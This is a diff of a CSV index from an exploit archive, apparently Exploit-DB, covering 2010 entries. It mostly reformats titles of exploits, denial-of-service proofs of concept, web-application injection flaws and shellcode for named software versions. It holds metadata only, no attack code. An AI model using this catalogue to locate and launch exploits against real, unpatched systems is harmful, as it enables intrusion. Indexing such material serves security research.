-15408,platforms/windows/dos/15408.html,"Crystal Report Viewer v8.0.0.371 ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 +15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h Local File Inclusion Vulnerability",2010-11-03,"Salvatore Fresta",php,webapps,0 15411,platforms/windows/dos/15411.pl,"HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability",2010-11-04,anT!-Tr0J4n,windows,dos,0 15412,platforms/php/webapps/15412.txt,"eoCMS 0.9.04 Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 @@ -13373,24 +13373,24 @@ id,file,description,date,author,platform,type,port 15416,platforms/php/webapps/15416.txt,"JBI CMS SQL Injection Vulnerability",2010-11-04,Cru3l.b0y,php,webapps,0 15417,platforms/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability",2010-11-04,moigai,windows,local,0 15418,platforms/windows/dos/15418.html,"Internet Explorer Memory Corruption 0day Vulnerability",2010-11-04,unknown,windows,dos,0 -15419,platforms/windows/dos/15419.txt,"Acrobat Reader v9.4 Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 +15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0 -15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,"Matteo Memelli",windows,remote,0 +15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/hardware/remote/15423.html,"Android 2.0-2.1 Reverse Shell Exploit",2010-11-05,"MJ Keith",hardware,remote,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 -15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro v3.1 (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 +15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of service vulnerability",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability",2010-11-05,"Fl0riX ",php,webapps,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 -15432,platforms/windows/dos/15432.html,"LEADTOOLS v11.5.0.9 ltisi11n.ocx DriverName() Access Violation",2010-11-05,"Matthew Bergin",windows,dos,0 -15433,platforms/windows/dos/15433.html,"LEADTOOLS v11.5.0.9 ltlst11n.ocx Insert() Access Violation",2010-11-05,"Matthew Bergin",windows,dos,0 -15434,platforms/windows/dos/15434.html,"LEADTOOLS v11.5.0.9 ltdlg11n.ocx GetColorRes() Access Violation",2010-11-05,"Matthew Bergin",windows,dos,0 -15435,platforms/windows/dos/15435.html,"LEADTOOLS v11.5.0.9 lttmb11n.ocx BrowseDir() Access Violation",2010-11-05,"Matthew Bergin",windows,dos,0 -15436,platforms/windows/dos/15436.html,"LEADTOOLS v11.5.0.9 ltdlg11n.ocx Bitmap Access Violation",2010-11-05,"Matthew Bergin",windows,dos,0 -15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro v2.1 Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 -15438,platforms/windows/remote/15438.txt,"AT-TFTP Server v1.8 Remote Directory Traversal Vulnerability",2010-11-06,"Yakir Wizman",windows,remote,0 +15432,platforms/windows/dos/15432.html,"LEADTOOLS 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 +15433,platforms/windows/dos/15433.html,"LEADTOOLS 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 +15434,platforms/windows/dos/15434.html,"LEADTOOLS 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 +15435,platforms/windows/dos/15435.html,"LEADTOOLS 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 +15436,platforms/windows/dos/15436.html,"LEADTOOLS 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 +15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 +15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal Vulnerability",2010-11-06,"Yakir Wizman",windows,remote,0 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15440,platforms/php/webapps/15440.txt,"Joomla Component (com_dcnews) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0 @@ -13398,7 +13398,7 @@ id,file,description,date,author,platform,type,port 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 -15447,platforms/php/webapps/15447.txt,"phpCow v2.1 File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 +15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"Pilot Cart 7.3 Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,Kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"FileCOPA FTP Server 6.01 directory traversal",2010-11-07,"Pawel h0wl Wylecial",windows,remote,21 @@ -13410,37 +13410,37 @@ id,file,description,date,author,platform,type,port 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 beta Binary Denial of Service Vulnerability",2010-11-08,41.w4r10r,windows,dos,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 -15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk v1.5 Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0 +15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 0day Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0 15462,platforms/php/webapps/15462.txt,"Joomla DCNews Component com_dcnews LFI Vulnerability",2010-11-08,"Th3 RDX",php,webapps,0 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 -15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator v2.5 SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 +15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 Blind SQL Injection Vulnerability",2010-11-09,"Salvatore Fresta",php,webapps,0 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability",2010-11-09,"Shane Bester",multiple,dos,0 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 -15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 -15472,platforms/php/webapps/15472.txt,"osCommerce v2.2 CSRF",2010-11-09,daandeveloper33,php,webapps,0 +15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 +15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0 15475,platforms/multiple/local/15475.txt,"IBM OmniFind Privilege Escalation Vulnerability",2010-11-09,"Fatih Kilic",multiple,local,0 15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler Denial of Service Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0 15480,platforms/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 Buffer Overflow Exploit",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15481,platforms/linux/dos/15481.c,"Linux Kernel Stack Infoleaks Vulnerability",2010-11-10,"Dan Rosenberg",linux,dos,0 -15482,platforms/windows/dos/15482.html,"Qtweb Browser v3.5 Buffer Overflow Vulnerability",2010-11-10,PoisonCode,windows,dos,0 -15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter v3.1 Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 +15482,platforms/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow Vulnerability",2010-11-10,PoisonCode,windows,dos,0 +15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0 -15486,platforms/php/webapps/15486.txt,"eBlog v1.7 Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 +15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk OS command injection",2010-11-11,"Aureliano Calvo",php,webapps,0 15489,platforms/windows/local/15489.py,"Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 15491,platforms/osx/dos/15491.txt,"Apple Directory Services Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 -15492,platforms/php/webapps/15492.php,"E-Xoopport v3.1 eCal display.php (katid) SQL Injection Exploit",2010-11-11,"Vis Intelligendi",php,webapps,0 +15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection Exploit",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 (.wav) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 15494,platforms/windows/dos/15494.pl,"VbsEdit v 4.7.2.0 (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15495,platforms/windows/dos/15495.py,"Power Audio Editor v7.4.3.230 (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15496,platforms/php/webapps/15496.txt,"Metinfo v3.0 Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 +15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability",2010-11-12,Daikin,asp,webapps,0 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 Remote Denial Of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 @@ -13452,19 +13452,19 @@ id,file,description,date,author,platform,type,port 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15508,platforms/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera Denial of Service Vulnerability",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 -15509,platforms/php/webapps/15509.txt,"Build a Niche Store v3.0 (BANS) Authentication Bypass Vulnerability",2010-11-13,"ThunDEr HeaD",php,webapps,0 -15510,platforms/php/webapps/15510.txt,"AWCM v2.1 final Remote File Inclusion Vulnerability",2010-11-13,LoSt.HaCkEr,php,webapps,0 +15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass Vulnerability",2010-11-13,"ThunDEr HeaD",php,webapps,0 +15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion Vulnerability",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite Remote SQL Injection Vulnerability",2010-11-13,God_Of_Pain,php,webapps,0 15513,platforms/php/webapps/15513.txt,"Wordpress Event Registration Plugin 5.32 SQL Injection Vulnerability",2010-11-13,k3m4n9i,php,webapps,0 -15514,platforms/windows/dos/15514.txt,"Foxit Reader v4.1.1 Stack Overflow Vulnerability",2010-11-13,dookie,windows,dos,0 +15514,platforms/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow Vulnerability",2010-11-13,dookie,windows,dos,0 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 search_app SQL Injection Vulnerability",2010-11-13,"Lord Tittis3000",php,webapps,0 15516,platforms/php/webapps/15516.txt,"EasyJobPortal Shell Upload Vulnerability",2010-11-13,MeGo,php,webapps,0 15517,platforms/php/webapps/15517.txt,"Webmatic (index.php) SQL Injection Vulnerability",2010-11-13,v3n0m,php,webapps,0 15518,platforms/php/webapps/15518.txt,"Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 -15519,platforms/php/webapps/15519.txt,"OneOrZero AIMS v2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 +15519,platforms/php/webapps/15519.txt,"OneOrZero AIMS 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal SQL Bypass Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro SQL Injection Vulnerability",2010-11-13,Cru3l.b0y,php,webapps,0 -15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability",2010-11-14,v3n0m,php,webapps,0 +15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection Vulnerability",2010-11-14,v3n0m,php,webapps,0 15532,platforms/windows/local/15532.py,"Foxit Reader 4.1.1 Stack Buffer Overflow Exploit",2010-11-14,Sud0,windows,local,0 15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 Exploit",2010-11-14,BraniX,windows,local,0 15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 Exploit",2010-11-14,BraniX,windows,local,0 @@ -13490,11 +13490,11 @@ id,file,description,date,author,platform,type,port 15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 Multiple Persistent XSS Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 Multiple SQL Injection Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 -15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability",2010-11-18,"Fl0riX ",php,webapps,0 +15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion Vulnerability",2010-11-18,"Fl0riX ",php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 SQL Injection Vulnerability",2010-11-18,"Matias Fontanini",php,webapps,0 -15569,platforms/windows/local/15569.rb,"MP3-Nator Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 +15569,platforms/windows/local/15569.rb,"MP3-Nator Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 -15571,platforms/php/webapps/15571.txt,"FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities",2010-11-18,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +15571,platforms/php/webapps/15571.txt,"FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities",2010-11-18,"Dr.0rYX and Cr3w-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"ViArt SHOP 4.0.5 Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 CSRF Vulnerability",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script Blind SQL Injection Vulnerability",2010-11-19,R3d-D3v!L,php,webapps,0 @@ -13502,7 +13502,7 @@ id,file,description,date,author,platform,type,port 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software SQL injection Vulnerability",2010-11-19,JaMbA,php,webapps,0 15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 -15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player v5.5.1 Heap Memory Corruption Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 +15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player NKI File Syntactic Analysis Buffer Overflow PoC",2010-11-20,LiquidWorm,windows,dos,0 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0 @@ -13511,7 +13511,7 @@ id,file,description,date,author,platform,type,port 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler Privilege Escalation 0day",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15592,platforms/php/webapps/15592.txt,"Sahitya Graphics CMS Multiple Remote Vulnerabilities",2010-11-21,"Dr.0rYX and Cr3w-DZ",php,webapps,0 -15593,platforms/php/webapps/15593.html,"Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0 +15593,platforms/php/webapps/15593.html,"Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download vulnerability",2010-11-22,Beach,jsp,webapps,0 @@ -13529,26 +13529,26 @@ id,file,description,date,author,platform,type,port 15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,altbta,php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0 -15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= v5.20 Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0 +15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel 'setup_arg_pages()' Denial of Service Vulnerability",2010-11-26,"Roland McGrath",linux,dos,0 -15620,platforms/linux/local/15620.sh,"Local Root Privilege Escalation Vulnerability in systemtap",2010-11-26,"Tavis Ormandy",linux,local,0 +15620,platforms/linux/local/15620.sh,"systemtap - Local Root Privilege Escalation Vulnerability",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15622,platforms/linux/dos/15622.c,"Linux Kernel Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 -15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting",2010-11-27,ZonTa,php,webapps,0 +15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting",2010-11-27,ZonTa,php,webapps,0 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0 day Exploit",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS Permanent XSS Vulnerability",2010-11-28,Jbyte,cgi,webapps,0 15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker ""txtSiteId"" SQL Injection Vulnerability",2010-11-28,underground-stockholm.com,asp,webapps,0 -15628,platforms/windows/dos/15628.py,"Hanso Player Version 1.4.0 (.m3u) Denial of Service Vulnerability",2010-11-28,anT!-Tr0J4n,windows,dos,0 +15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - (.m3u) Denial of Service Vulnerability",2010-11-28,anT!-Tr0J4n,windows,dos,0 15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website search.asp, showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH)",2010-11-29,0v3r,windows,local,0 15631,platforms/hardware/remote/15631.txt,"HP LaserJet Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 -15632,platforms/windows/dos/15632.py,"FoxPlayer v2.4.0 Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 +15632,platforms/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 15633,platforms/php/webapps/15633.html,"Diferior 8.03 Multiple XSS Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC",2010-11-30,0v3r,windows,dos,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 Arbitrary File Upload Vulnerability",2010-11-30,"Mark Stanislav",php,webapps,0 @@ -13563,23 +13563,23 @@ id,file,description,date,author,platform,type,port 15645,platforms/php/webapps/15645.txt,"Enano CMS 1.1.7pl1 Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15647,platforms/php/webapps/15647.txt,"Elxis CMS 2009.2 SQL Injection Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 -15648,platforms/windows/remote/15648.html,"J-Integra v2.11 Remote Code Execution Exploit",2010-12-01,bz1p,windows,remote,0 +15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution Exploit",2010-12-01,bz1p,windows,remote,0 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 SQL Injection Vulnerability",2010-12-01,"Dr.0rYX and Cr3w-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 Arbitrary File Upload Vulnerability",2010-12-01,"Shichemt Alen",php,webapps,0 15653,platforms/asp/webapps/15653.txt,"BugTracker.Net 3.4.4 Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 15654,platforms/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 Arbitrary File Upload Vulnerability",2010-12-01,eidelweiss,php,webapps,0 -15655,platforms/windows/remote/15655.html,"J-Integra v2.11 ActiveX SetIdentity() Buffer Overflow Exploit",2010-12-01,Dr_IDE,windows,remote,0 +15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow Exploit",2010-12-01,Dr_IDE,windows,remote,0 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 Denial of Service Vulnerability",2010-12-02,h1ch4m,windows,dos,0 -15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold v5.5 Image2PDF() Buffer Overflow (msf)",2010-12-02,bz1p,windows,remote,0 +15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (msf)",2010-12-02,bz1p,windows,remote,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"Etomite 1.1 Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL 